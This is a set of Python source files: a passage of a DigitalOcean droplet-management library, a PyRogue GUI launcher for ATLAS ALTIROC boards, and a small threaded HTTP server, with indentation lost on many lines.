droplet_objects = []
for droplet_item in droplet_list:
newdroplet = Droplet(status="retrieve")
newdroplet.attributes = DropletAttributes(**droplet_item)
droplet_objects.append(newdroplet)
return droplet_objects
# def retrieve_all_droplets_by_tag(self, tag_name=None):
# """
# Returns an array of Droplet objects, one for each droplet in digitalocean account.
#
# Returns:
# [type]: [description]
# """
#
# If no tag has been provided, return no droplets
# if tag_name == None:
# return []
# Build list of droplets from api, but take in to account possible pagination.
# droplet_list = []
# page, per_page = 1, 10
# response = self.dropletapi.list_all_droplets_by_tag(
# tag_name=tag_name, page=page, per_page=per_page
# )
# content = json.loads(response.content.decode("utf-8"))
# droplet_list.extend(content["droplets"])
# try:
# while content["links"]["pages"]["next"]:
# page = page + 1
# response = self.dropletapi.list_all_droplets(
# page=page, per_page=per_page
# )
# content = json.loads(response.content.decode("utf-8"))
# droplet_list.extend(content["droplets"])
# except KeyError:
# pass
# Build and return that Droplet object array.
# droplet_objects = []
# for droplet_item in droplet_list:
# newdroplet = Droplet(status="retrieve")
# newdroplet.attributes = DropletAttributes(**droplet_item)
# droplet_objects.append(newdroplet)
# return droplet_objects
def retrieve_droplets_with_only_tags(self, tag: list):
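        # "only": a droplet matches when its tag set is exactly equal to the given tags.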
if isinstance(tag, str):
tag = [tag]
return_droplets = []
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if set(list(tag)) == set(droplet.attributes.tags):
return_droplets.append(droplet)
if len(return_droplets) > 0:
return return_droplets
else:
            raise ErrorDropletNotFound(
                f"No droplets with exactly the tags: {tag} were found."
            )
def delete_droplets_with_only_tags(self, tag: list):
if isinstance(tag, str):
tag = [tag]
try:
droplets = self.retrieve_droplets_with_only_tags(tag)
for droplet in droplets:
self.delete_droplet(droplet)
        except ErrorDropletNotFound:
            pass
def retrieve_droplets_with_all_tags(self, tag: list):
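        # "all": a droplet matches when every given tag is present in its tag set.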
if isinstance(tag, str):
tag = [tag]
return_droplets = []
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if set(list(tag)).issubset(set(droplet.attributes.tags)):
return_droplets.append(droplet)
if len(return_droplets) > 0:
return return_droplets
else:
raise ErrorDropletNotFound(
f"No droplets containing all tags: {tag} were found."
)
def delete_droplets_with_all_tags(self, tag: list):
if isinstance(tag, str):
tag = [tag]
try:
droplets = self.retrieve_droplets_with_all_tags(tag)
for droplet in droplets:
self.delete_droplet(droplet)
        except ErrorDropletNotFound:
            pass
def retrieve_droplets_with_any_tags(self, tag: list):
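        # "any": a droplet matches when it shares at least one tag with the given set.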
if isinstance(tag, str):
tag = [tag]
return_droplets = []
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if not set(list(tag)).isdisjoint(set(droplet.attributes.tags)):
return_droplets.append(droplet)
if len(return_droplets) > 0:
return return_droplets
else:
            raise ErrorDropletNotFound(
                f"No droplets containing any of the tags: {tag} were found."
            )
def delete_droplets_with_any_tags(self, tag: list):
if isinstance(tag, str):
tag = [tag]
try:
droplets = self.retrieve_droplets_with_any_tags(tag)
for droplet in droplets:
self.delete_droplet(droplet)
        except ErrorDropletNotFound:
            pass
def delete_droplet(self, droplet: Droplet):
        if droplet.deleted:
            raise ErrorDropletNotFound(f"{droplet.attributes.id} was already deleted")
        self.delete_droplet_by_id(droplet.attributes.id)
        droplet.deleted = True
def delete_droplet_by_id(self, id):
if self.does_droplet_id_exist(id):
response = self.dropletapi.delete_droplet_id(id)
#def delete_droplets_by_tag(self, tag_name=None):
# if not tag_name == None:
# response = self.dropletapi.delete_droplet_tag(tag_name=tag_name)
def does_droplet_id_exist(self, id):
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if str(droplet.attributes.id) == str(id):
return True
return False
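# Illustrative usage sketch (not part of the library): the tag helpers above differ
# only in how they compare tag sets -- "only" requires an exact match, "all" requires
# a subset, "any" requires a non-empty intersection. The tag values below ("web",
# "staging") are hypothetical placeholders.
#
#   manager = DropletManager()
#   exact = manager.retrieve_droplets_with_only_tags(["web", "staging"])   # tags == {web, staging}
#   superset = manager.retrieve_droplets_with_all_tags(["web"])            # {web} is a subset of the droplet's tags
#   overlap = manager.retrieve_droplets_with_any_tags(["web", "staging"])  # at least one tag matches
#   manager.delete_droplets_with_any_tags(["staging"])                     # deletes every droplet sharing a tag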
@dataclass
class DropletAttributes:
id: int = None
name: str = None
memory: int = None
vcpus: int = None
disk: int = None
locked: bool = None
created_at: str = None
status: str = None
backup_ids: list = field(default_factory=list)
snapshot_ids: list = field(default_factory=list)
features: list = field(default_factory=list)
region: object = field(default_factory=list)
image: object = field(default_factory=list)
size: object = field(default_factory=list)
size_slug: str = None
networks: object = field(default_factory=list)
kernel: object = field(default_factory=list)
next_backup_window: object = field(default_factory=list)
tags: list = field(default_factory=list)
volume_ids: list = field(default_factory=list)
    vpc_uuid: str = None
@dataclass
class DropletArguments:
name: str = None
region: str = None
size: str = None
image: object = None
ssh_keys: list = field(default_factory=list)
backups: bool = None
ipv6: bool = None
private_networking: bool = None
vpc_uuid: str = None
user_data: str = None
monitoring: bool = None
volumes: list = field(default_factory=list)
tags: list = field(default_factory=list)
#@dataclass
#class DropletLastAction:
# id: int = None
# status: str = None
# type: str = None
# started_at: str = None
# completed_at: str = None
# resource_id: int = None
# resource_type: str = None
# region: object = None
# region_slug: str = None
class Droplet:
def __init__(self, status=None):
self.arguments = DropletArguments()
self.attributes = DropletAttributes()
        self.lastaction: Action = None
self.attributes.status = status
self.dropletapi = Droplets()
self.volumeapi = Volumes()
self.action_manager = ActionManager()
self.size_manager = SizeManager()
self.volume_manager = VolumeManager()
self.snapshot_manager = SnapshotManager()
self.droplet_manager = DropletManager()
        # Mark the droplet as not deleted before the background status thread may call update().
        self.deleted = False
        self.update_on_active_status()
    def update(self):
        """
        Updates the Droplet attributes data class with the latest droplet information at DigitalOcean.
        """
        if self.deleted:
            raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
        response = self.dropletapi.retrieve_droplet_by_id(self.attributes.id)
        if response:
            content = json.loads(response.content.decode("utf-8"))
            droplet_data = dict(content["droplet"])
            self.attributes = DropletAttributes(**droplet_data)
    def update_on_active_status(self):
        """
        A freshly created droplet needs time to boot completely and become active.
        Information like IP addresses is not available until the droplet is active.
        Here we start a background thread that waits for the droplet to become active and then updates the droplet attributes.
        """
        def update_status():
            while self.attributes.status != "active":
                if self.attributes.status is None:
                    time.sleep(10)
                elif self.attributes.status == "new":
                    self.update()
                    time.sleep(10)
                else:
                    break

        # Daemon thread so a droplet that never reaches "active" does not block interpreter exit.
        thread = threading.Thread(target=update_status, daemon=True)
        thread.start()
###### Do we need to update droplet action, if action already updates itself
# def update_droplet_action(self):
# """
# Updates the Droplet lastaction data class with the latest droplet action information at digital ocean.
# """
# response = self.dropletapi.retrieve_droplet_action(
# self.attributes.id, self.lastaction.id
# )
# if response:
# content = json.loads(response.content.decode("utf-8"))
# action_data = dict(content["action"])
# self.lastaction = DropletLastAction(**action_data)
# def update_on_active_action(self):
# """
# A freshly created droplet will need time to completely boot up and be active.
# Information like IP addresses are not available untill the droplet is active.
# Here we start a background thread that waits for the droplet to become active and then update the droplet attributes.
# """
# def update_action():
# while (self.lastaction.status == None) or (
# self.lastaction.status == "in-progress"
# ):
# if not self.lastaction.status in ["completed", "errored"]:
# time.sleep(10)
# self.update_droplet_action()
# else:
# break
# if self.lastaction.status == "errored":
# raise ErrorActionFailed(
# f"Action {self.attributes.id},{self.attributes.type} failed"
# )
#
# thread = threading.Thread(target=update_action, args=())
# thread.start()
def reboot(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.reboot_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def powercycle(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.powercycle_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def shutdown(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.shutdown_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def poweroff(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.poweroff_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def poweron(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.poweron_droplet(droplet_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def rebuild(self, image):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
droplet_id = self.attributes.id
response = self.dropletapi.rebuild_droplet(droplet_id, image)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def rename(self, name):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
self.droplet_manager.is_valid_droplet_name(name)
droplet_id = self.attributes.id
response = self.dropletapi.rename_droplet(droplet_id, name)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def create_snapshot(self, name):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
id = self.attributes.id
response = self.dropletapi.create_snapshot_from_droplet(id, name)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action(ActionAttributes(**action_data))
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
#print(newaction.attributes.started_at)
#print(newaction.attributes.completed_at)
snapshot_objects=self.retrieve_snapshots()
for snapshot_object in snapshot_objects:
if (snapshot_object.attributes.name==name) and (snapshot_object.attributes.created_at==newaction.attributes.started_at):
return snapshot_object
return None
def restore_droplet(self, image_id):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
id = self.attributes.id
response = self.dropletapi.restore_droplet(id, image_id)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action(ActionAttributes(**action_data))
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
def resize_droplet(self, slug_size, disk_resize=False):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
        # Resizing to a smaller disk is not supported, so guard against it here.
desired_size = self.size_manager.retrieve_size(slug_size)
target_disk_size = desired_size.attributes.disk
current_disk_size = self.attributes.disk
if target_disk_size < current_disk_size:
raise ErrorDropletResizeDiskError(
"You can't resize to a smaller disk, resize to same disk size with different RAM memory instead"
)
id = self.attributes.id
response = self.dropletapi.resize_droplet(
id, slug_size, disk_resize=disk_resize
)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction = Action()
newaction.attributes = ActionAttributes(**action_data)
self.action_manager.wait_for_action_completion(newaction)
self.lastaction = newaction
self.poweron()
def delete(self):
        if self.deleted:
            raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
        self.dropletapi.delete_droplet_id(self.attributes.id)
        self.deleted = True
def retrieve_snapshots(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
id = self.attributes.id
snapshot_list = []
page, per_page = 1, 10
response = self.dropletapi.list_snapshots_for_droplet(
id=id, page=page, per_page=per_page
)
content = json.loads(response.content.decode("utf-8"))
snapshot_list.extend(content["snapshots"])
try:
while content["links"]["pages"]["next"]:
page = page + 1
response = self.dropletapi.list_snapshots_for_droplet(
id=id, page=page, per_page=per_page
)
content = json.loads(response.content.decode("utf-8"))
snapshot_list.extend(content["snapshots"])
except KeyError:
pass
#print(snapshot_list)
# Build and return that Snapshot object array.
dropletsnapshot_objects = []
for snapshot_item in snapshot_list:
newdropletsnapshot = DropletSnapshot()
newdropletsnapshot.attributes = DropletSnapshotAttributes(**snapshot_item)
dropletsnapshot_objects.append(newdropletsnapshot)
return dropletsnapshot_objects
    def retrieve_snapshot_by_id(self, snapshot_id):
        snapshots = self.retrieve_snapshots()
        for snapshot in snapshots:
            if snapshot.attributes.id == snapshot_id:
                return snapshot
        return None
def retrieve_associated_volumes(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
self.update()
volume_ids = self.attributes.volume_ids
# build volume objects and add to list
volume_objects = []
for volume_id in volume_ids:
newvolume = self.volume_manager.retrieve_volume_by_id(volume_id)
volume_objects.append(newvolume)
return volume_objects
def count_associated_volumes(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
volumes = self.retrieve_associated_volumes()
return len(volumes)
def retrieve_associated_volume_snapshots(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
self.update()
volume_snapshot_ids = self.attributes.snapshot_ids
        # Build volume snapshot objects and add them to the list.
volume_snapshot_objects = []
for volume_snapshot_id in volume_snapshot_ids:
newvolume_snapshot = self.snapshot_manager.retrieve_snapshot_id(
volume_snapshot_id
)
volume_snapshot_objects.append(newvolume_snapshot)
return volume_snapshot_objects
def count_associated_volume_snapshots(self):
        if self.deleted:
raise ErrorDropletNotFound(f"{self.attributes.id} was deleted")
volume_snapshots = self.retrieve_associated_volume_snapshots()
return len(volume_snapshots)
    def attach_a_volume(self, target_volume: Volume):
        # The target volume must be in the same region as the droplet.
        if not self.attributes.region == target_volume.attributes.region:
            raise ErrorNotSameRegion(
                f"Volume {target_volume.attributes.id} is not in the same region as Droplet {self.attributes.id}"
            )
        # Only 7 volumes may be attached per droplet, so refuse to attach an eighth.
        self.update()
        if self.count_associated_volumes() >= 7:
            raise ErrorDropletAttachedVolumeCountAlreadAtLimit(
                f"Droplet id:{self.attributes.id} already has the maximum of 7 attached volumes"
            )
        # Volumes can only be attached to one droplet at a time,
        # so detach the volume from any other droplet first.
        target_volume.detach_from_droplets()
        response = self.volumeapi.attach_volume_to_droplet(
            target_volume.attributes.id, self.attributes.id, self.attributes.region['slug']
        )
        if response:
            content = json.loads(response.content.decode("utf-8"))
            action_data = dict(content["action"])
            newaction = Action(ActionAttributes(**action_data))
            self.action_manager.wait_for_action_completion(newaction)
            self.lastaction = newaction
self.update()
target_volume.update()
    def detach_a_volume(self, target_volume: Volume):
target_volume.detach_from_droplets()
self.update()
target_volume.update()
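# Illustrative sketch (not part of the library): attaching a volume runs through the
# constraints enforced above -- same region, at most 7 attached volumes per droplet,
# and one droplet per volume. The droplet id and volume id below are hypothetical.
#
#   droplet = DropletManager().retrieve_droplet_by_id(123456789)
#   volume = VolumeManager().retrieve_volume_by_id("506f78a4-e098-11e5-ad9f-000f53306ae1")
#   droplet.attach_a_volume(volume)       # detaches the volume elsewhere first, then attaches it here
#   print(droplet.count_associated_volumes())
#   droplet.detach_a_volume(volume)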
if __name__ == "__main__":
dmanager = DropletManager()
# a_droplet = dmanager.create_new_droplet(
# name="example.com",
# region="nyc3",
# size="s-1vcpu-1gb",
# image="ubuntu-16-04-x64",
# ssh_keys=[],
# backups=False,
# ipv6=True,
# user_data=None,
# private_networking=None,
# volumes=None,
# tags=["banabas"],
# )
# while not a_droplet.attributes.status == "active":
# time.sleep(5)
# print("waiting")
# print("-----arguments-----")
# print(a_droplet.arguments)
# print("-------ATTRIBUTES-------------")
# print(a_droplet.attributes)
## try:
# newdroplet = dmanager.retrieve_droplet_by_id(2496119371)
# except DropletNotFound:
# print("Droplet wasnt found")
# print(newdroplet.attributes)
# print(newdroplet.arguments)
# 249699371
# droplets = dmanager.retrieve_all_droplets_by_tag("banabas")
# for droplet in droplets:
# print(f"Deleteing droplet with id {droplet.attributes.id}")
# dmanager.delete_droplet(droplet)
# print(dmanager.does_droplet_id_exist(249699371))
# dmanager.delete_droplets_by_tag("banabas")
droplets = dmanager.retrieve_droplets_by_name("example.com")
for droplet in droplets:
print(droplet.attributes.name)
droplet.powercycle()
        while (droplet.lastaction.status is None) or (
            droplet.lastaction.status == "in-progress"
        ):
time.sleep(5)
print("waiting for action...")
print(droplet.lastaction)
print("finished")
|
DevGui.py
|
#!/usr/bin/env python3
##############################################################################
## This file is part of 'ATLAS ALTIROC DEV'.
## It is subject to the license terms in the LICENSE.txt file found in the
## top-level directory of this distribution and at:
## https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
## No part of 'ATLAS ALTIROC DEV', including this file,
## may be copied, modified, propagated, or distributed except according to
## the terms contained in the LICENSE.txt file.
##############################################################################
import sys
import rogue
import pyrogue as pr
import pyrogue.gui
import argparse
import common as feb
import time
import threading
#################################################################
Keep_display_alive = True
Live_display_interval = 1
#################################################################
def runLiveDisplay(event_display, fpga_index):
    # Refresh the live display periodically until the module-level flag is cleared.
    # fpga_index identifies the board this thread serves but is currently unused here.
    while(Keep_display_alive):
        event_display.refreshDisplay()
        time.sleep(Live_display_interval)
#################################################################
# Set the argument parser
parser = argparse.ArgumentParser()
# Convert str to bool
argBool = lambda s: s.lower() in ['true', 't', 'yes', '1']
# Add arguments
parser.add_argument(
"--ip",
nargs ='+',
required = True,
help = "List of IP addresses",
)
parser.add_argument(
"--pollEn",
type = argBool,
required = False,
default = True,
help = "Enable auto-polling",
)
parser.add_argument(
"--initRead",
type = argBool,
required = False,
default = True,
help = "Enable read all variables at start",
)
parser.add_argument(
"--loadYaml",
type = argBool,
required = False,
default = True,
help = "Enable loading of the defaults at start",
)
parser.add_argument(
"--defaultFile",
type = str,
required = False,
default = 'config/defaults.yml',
help = "default configuration file to be loaded before user configuration",
)
parser.add_argument(
"--userYaml",
nargs ='+',
required = False,
default = [''],
help = "List of board specific configurations to be loaded after defaults",
)
parser.add_argument(
"--refClkSel",
nargs ='+',
required = False,
default = ['IntClk'],
help = "Selects the reference input clock for the jitter cleaner per FPGA \
PLL: IntClk = on-board OSC, ExtSmaClk = 50 Ohm SMA Clock, ExtLemoClk = 100Ohm diff pair Clock",
)
parser.add_argument(
"--printEvents",
type = argBool,
required = False,
default = False,
help = "prints the stream data event frames",
)
parser.add_argument(
"--liveDisplay",
type = argBool,
required = False,
default = False,
help = "Displays live plots of pixel information",
)
# Get the arguments
args = parser.parse_args()
#################################################################
# Setup root class
print(args.ip)
top = feb.Top(
ip = args.ip,
pollEn = args.pollEn,
initRead = args.initRead,
loadYaml = args.loadYaml,
defaultFile = args.defaultFile,
userYaml = args.userYaml,
refClkSel = args.refClkSel,
)
# Create the Event reader streaming interface
if (args.printEvents):
eventReader = feb.PrintEventReader()
# Connect the file reader to the event reader
pr.streamTap(top.dataStream[0], eventReader)
# Create Live Display
live_display_resets = []
if args.liveDisplay:
for fpga_index in range( top.numEthDev ):
# Create the fifo to ensure there is no back-pressure
fifo = rogue.interfaces.stream.Fifo(100, 0, True)
# Connect the device reader ---> fifo
pr.streamTap(top.dataStream[fpga_index], fifo)
# Create the pixelreader streaming interface
event_display = feb.onlineEventDisplay(
plot_title='FPGA ' + str(fpga_index),
submitDir='display_snapshots',
font_size=4,
fig_size=(10,6),
overwrite=True )
live_display_resets.append( event_display.reset )
# Connect the fifo ---> stream reader
pr.streamConnect(fifo, event_display)
# Retrieve pixel data streaming object
display_thread = threading.Thread( target=runLiveDisplay, args=(event_display,fpga_index,) )
display_thread.start()
top.add_live_display_resets(live_display_resets)
# Create GUI
appTop = pr.gui.application(sys.argv)
guiTop = pr.gui.GuiTop()
appTop.setStyle('Fusion')
guiTop.addTree(top)
guiTop.resize(600, 800)
print("Starting GUI...\n");
# Run GUI
appTop.exec_()
# Close
Keep_display_alive = False
top.stop()
exit()
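#################################################################
# Example invocation (hedged sketch; the IP address and YAML path are
# hypothetical placeholders, not values shipped with this repository):
#
#   python DevGui.py --ip 192.168.1.10 --liveDisplay True --printEvents False \
#       --userYaml config/board0.yml
#################################################################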
|
httpserver.py
|
#!/usr/bin/python
# -*-coding: utf8 -*-
import threading
from BaseHTTPServer import HTTPServer
from SocketServer import ThreadingMixIn
from httpserverhandler import HttpServerHandler
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
class HttpServer():
def __init__(self):
pass
def run(self, port_number):
threading.Thread(target=self.run_internal, args=[port_number]).start()
@staticmethod
def run_internal(port_number):
try:
server = ThreadedHTTPServer(('', port_number), HttpServerHandler)
print 'Started httpserver on port ', server.server_port
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
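# Hedged usage sketch (Python 2, matching this module): port 8080 is an arbitrary
# example value, and HttpServerHandler is assumed importable from httpserverhandler
# as imported above.
#
#   if __name__ == '__main__':
#       HttpServer().run(8080)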
|